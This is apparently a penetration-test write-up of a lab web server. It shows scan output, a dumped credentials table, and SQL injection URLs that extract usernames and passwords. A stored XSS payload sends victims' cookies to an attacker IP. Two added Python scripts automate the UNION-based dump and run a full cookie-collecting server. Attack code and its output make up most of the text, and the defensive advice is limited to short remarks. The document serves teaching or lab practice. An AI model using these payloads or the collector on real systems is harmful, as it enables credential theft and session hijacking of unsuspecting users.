Mateusz Suchocki, Kazimierz Kochan
IP ranges: 10.5.1.0/24 and 10.5.2.0/24
Discovered 3 hosts: 10.5.1.10, 10.5.1.11 and 10.5.2.10
10.5.1.10 is a DMZ web server with one open service (nmap service scan, followed by the directory brute-force results):
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.2.9 ((Debian) PHP/5.2.6-1+lenny16 with Suhosin-Patch)
|_http-methods: No Allow or Public header in OPTIONS response (status code 200)
|_http-title: exploit.co.il : Articles : Tutorials : Reviews : Videos
301 GET 9l 31w 344c http://10.5.1.10/admin => http://10.5.1.10/admin/
301 GET 9l 31w 345c http://10.5.1.10/images => http://10.5.1.10/images/
200 GET 45l 178w 2295c http://10.5.1.10/search
301 GET 9l 31w 346c http://10.5.1.10/uploads => http://10.5.1.10/uploads/
200 GET 0l 0w 0c http://10.5.1.10/config
200 GET 129l 406w 5743c http://10.5.1.10/news
200 GET 142l 387w 5050c http://10.5.1.10/downloads
200 GET 46l 184w 2488c http://10.5.1.10/links
301 GET 9l 31w 347c http://10.5.1.10/database => http://10.5.1.10/database/
200 GET 388l 1071w 0c http://10.5.1.10/index
200 GET 388l 1071w 0c http://10.5.1.10/
200 GET 166l 526w 7108c http://10.5.1.10/articles
200 GET 93l 289w 3829c http://10.5.1.10/videos
200 GET 1l 15w 248c http://10.5.1.10/footer
200 GET 1l 3w 9662c http://10.5.1.10/favicon
200 GET 24l 115w 1295c http://10.5.1.10/menu
200 GET 465l 1202w 0c http://10.5.1.10/results
200 GET 98l 243w 16850c http://10.5.1.10/logo
200 GET 70l 211w 2875c http://10.5.1.10/authors
200 GET 1l 2w 50c http://10.5.1.10/dot
200 GET 35l 154w 1920c http://10.5.1.10/newspage
Under the /database endpoint there is an exploit.sql script with credentials:
INSERT INTO `members` (`id`, `username`, `password`) VALUES
(1, 'admin', 'P@ssw0rd'),
(2, 'r00t', '1qa2ws'),
(3, 'editor', 'q1w2e3r4');
the e-mail addresses and websites of the authors:
INSERT INTO `authors` (`id`, `name`, `mail`, `site`) VALUES
(1, 'NightRanger', 'shai[at]exploit.co.il', 'http://exploit.co.il'),
(2, 'Joe McCray', 'N/A', 'N/A'),
(3, 'Imperva', 'N/A', 'http://www.imperva.com'),
(4, 'PaulDotCom', 'N/A', 'http://pauldotcom.com'),
(5, 'phpacademy', 'N/A', 'N/A'),
(6, 'Raul Siles', 'N/A', 'http://www.raulsiles.com'),
(7, 'SecuriTeam', 'N/A', 'http://www.securiteam.com'),
(8, 'Wikipedia', 'N/A', 'http://www.wikipedia.org'),
(9, 'Prashant Uniyal', 'N/A', 'N/A'),
(10, 'novaca!ne', 'N/A', 'N/A'),
(11, 'GlaDiaT0R', 'N/A', 'N/A'),
(12, 'zeroday', 'N/A', 'N/A'),
(13, 'Chris Anley', 'N/A', 'N/A'),
(14, 'Kevin Spett', 'N/A', 'N/A'),
(15, 'AnalyseR', 'N/A', 'N/A'),
(16, 'Marezzi', 'N/A', 'N/A'),
(17, 'Dapirates', 'N/A', 'N/A'),
(18, 'CWH Underground', 'N/A', 'N/A'),
(19, 'Frego', 'N/A', 'N/A'),
(20, 'Omni', 'N/A', 'N/A');
and some server information (phpMyAdmin, MySQL and PHP versions):
-- phpMyAdmin SQL Dump
-- version 3.3.2deb1
-- http://www.phpmyadmin.net
--
-- Host: localhost
-- Generation Time: Sep 24, 2010 at 08:20 AM
-- Server version: 5.1.41
-- PHP Version: 5.3.2-1ubuntu4.5
The id parameter of authors.php is vulnerable to SQL injection: the value lands inside a single-quoted string, and a 7-column UNION first lists the database schemas and then dumps the members table:
http://10.5.1.10/authors.php?id=1%27%20UNION%20ALL%20SELECT%20NULL,NULL,CONCAT(schema_name),NULL,NULL,NULL,NULL%20FROM%20information_schema.schemata--%20-
http://10.5.1.10/authors.php?id=1%27%20UNION%20ALL%20SELECT%20NULL,NULL,username,password,NULL,NULL,NULL%20FROM%20members--%20-
+----+----------+----------+
| id | password | username |
+----+----------+----------+
| 1 | P@ssw0rd | admin |
| 2 | 1qa2ws | r00t |
| 3 | q1w2e3r4 | editor |
+----+----------+----------+
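As an added illustration (not code from the writeup), the stand-in below reproduces the UNION technique against an in-memory SQLite copy of the tables from exploit.sql: it probes for the column count with a growing list of NULLs (which is how the 7 is found), then places username and password in the 3rd and 4th slots exactly as the URL above does, and shows that the same payload returns nothing once the id is bound as a parameter. Assumptions: the 7-column SELECT behind authors.php (the page only shows that a 7-value UNION works) and its extra columns bio/joined/active are invented here, and SQLite stands in for the target's MySQL 5.1, so the information_schema payload is not reproduced.

```python
import sqlite3

# Constructed in-memory database standing in for the target's MySQL server.
# members/authors rows are the ones from exploit.sql; the columns bio, joined
# and active are assumed, because the real SELECT in authors.php is not known.
SCHEMA = """
CREATE TABLE members (id INTEGER, username TEXT, password TEXT);
CREATE TABLE authors (id INTEGER, name TEXT, mail TEXT, site TEXT,
                      bio TEXT, joined TEXT, active INTEGER);
INSERT INTO members VALUES (1,'admin','P@ssw0rd'),(2,'r00t','1qa2ws'),(3,'editor','q1w2e3r4');
INSERT INTO authors VALUES
 (1,'NightRanger','shai[at]exploit.co.il','http://exploit.co.il','','2010-01-01',1),
 (2,'Joe McCray','N/A','N/A','','2010-01-01',1);
"""

AUTHOR_COLS = "id, name, mail, site, bio, joined, active"  # 7 columns (assumed)


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def query_vulnerable(conn, id_param):
    # String concatenation, as PHP's mysql_query("... WHERE id='$id'") would do it.
    sql = f"SELECT {AUTHOR_COLS} FROM authors WHERE id='{id_param}'"
    return conn.execute(sql).fetchall()


def query_safe(conn, id_param):
    # Bound parameter: the payload is compared as one literal string and matches no row.
    sql = f"SELECT {AUTHOR_COLS} FROM authors WHERE id=?"
    return conn.execute(sql, (id_param,)).fetchall()


def union_payload(values, table=None):
    # Builds  1' UNION ALL SELECT <values> [FROM <table>]-- -   (the form used on the page);
    # the trailing "-- -" comments out the closing quote of the original query.
    tail = f" FROM {table}" if table else ""
    return "1' UNION ALL SELECT " + ",".join(values) + tail + "-- -"


def find_column_count(run, max_cols=20):
    """Probe with 1..max_cols NULLs; the first count that yields an extra all-NULL
    row is the column count of the original SELECT. None if no probe succeeds."""
    for n in range(1, max_cols + 1):
        try:
            rows = run(union_payload(["NULL"] * n))
        except sqlite3.OperationalError:  # column-count mismatch; MySQL errors out as well
            continue
        if any(r[0] is None for r in rows):  # UNION rows carry NULL in the id slot
            return n
    return None


def dump_members(run, ncols):
    """Put username/password into the 3rd/4th slots, as the page's payload does,
    and keep only the rows that came from the UNION (id is NULL)."""
    values = ["NULL"] * ncols
    values[2], values[3] = "username", "password"
    rows = run(union_payload(values, "members"))
    return [(r[2], r[3]) for r in rows if r[0] is None]


if __name__ == "__main__":
    conn = make_db()
    vuln = lambda p: query_vulnerable(conn, p)
    n = find_column_count(vuln)
    print("columns in the original SELECT:", n)
    for user, pw in dump_members(vuln, n):
        print(user, pw)
    print("same probes against the parameterised query:",
          find_column_count(lambda p: query_safe(conn, p)))
```

The slot positions matter: a UNION value only becomes visible where the page template actually renders that column, which is why the writeup lands the data in positions 3 and 4 (the author name/mail fields) rather than in the id slot.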
The PHP database connection script, with the MySQL root credentials hardcoded in plaintext:
<?php
$servername='localhost'; // Your MySql Server Name or IP address here
$dbusername='root'; // Login user id here
$dbpassword='You should change this passphrase'; // Login password here
$dbname='exploit'; // Your database name here
connecttodb($servername,$dbname,$dbusername,$dbpassword);
function connecttodb($servername,$dbname,$dbuser,$dbpassword)
{
global $link;
$link=mysql_connect ("$servername","$dbuser","$dbpassword");
if(!$link){die("Could not connect to MySQL");}
mysql_select_db("$dbname",$link) or die ("could not open db".mysql_error());
}
?>
Under /images there are two interesting images (not reproduced here).
XSS payload placed in a note's description:
<script>new Image().src="http://192.168.111.129/cookie.php?c="+document.cookie;</script>
This sends the session cookie of every user who views the infected note to the attacker-controlled host 192.168.111.129.
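The receiving side of that payload, as an added example that is not part of the writeup: the injected image request hits http://<attacker>/cookie.php?c=<document.cookie>, so all cookie.php has to do is record the query string. The real cookie.php is not on the page; this Python stand-in (listen address, port and sample cookie values are constructed) parses the callback and logs the victim's address, Referer and cookies.

```python
import urllib.parse
from http.server import BaseHTTPRequestHandler, HTTPServer

# In-memory log standing in for the file the real cookie.php would append to.
CAPTURED = []


def parse_cookie_callback(path):
    """Extract the stolen cookies from a request path such as
    /cookie.php?c=PHPSESSID=abc123;%20theme=dark  ->  {'PHPSESSID': 'abc123', 'theme': 'dark'}
    Returns None for any other path or when no c= parameter is present."""
    parsed = urllib.parse.urlsplit(path)
    if parsed.path != "/cookie.php":
        return None
    raw = None
    # Split the query by hand: document.cookie itself contains '=' and ';',
    # which parse_qs on older Python versions treats as a separator.
    for pair in parsed.query.split("&"):
        key, _, value = pair.partition("=")
        if key == "c":
            raw = urllib.parse.unquote(value)
            break
    if raw is None:
        return None
    cookies = {}
    for item in raw.split(";"):
        name, sep, val = item.strip().partition("=")
        if sep:
            cookies[name] = val
    return cookies


class CookieSink(BaseHTTPRequestHandler):
    """Answers the <img> beacon with an empty image so the victim sees nothing odd."""

    def do_GET(self):
        cookies = parse_cookie_callback(self.path)
        if cookies:
            CAPTURED.append({
                "victim": self.client_address[0],
                "referer": self.headers.get("Referer"),  # page the note was viewed on
                "cookies": cookies,
            })
        self.send_response(200)
        self.send_header("Content-Type", "image/gif")
        self.send_header("Content-Length", "0")
        self.end_headers()

    def log_message(self, fmt, *args):
        pass  # keep stderr quiet; CAPTURED is the record


if __name__ == "__main__":
    # Constructed listen address; the payload on the page points at 192.168.111.129.
    srv = HTTPServer(("0.0.0.0", 8080), CookieSink)
    print("collector listening on :8080/cookie.php (Ctrl-C to stop)")
    try:
        srv.serve_forever()
    except KeyboardInterrupt:
        pass
    for entry in CAPTURED:
        print(entry)
```

The exfiltration only works because the session cookie is readable from JavaScript: document.cookie never exposes cookies flagged HttpOnly, so setting that flag on the session cookie (for PHP, session.cookie_httponly) blocks this particular payload, although it does not remove the stored XSS itself.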
If you need help, just write.
Recommendation: the firewall should block traffic between the DMZ segments.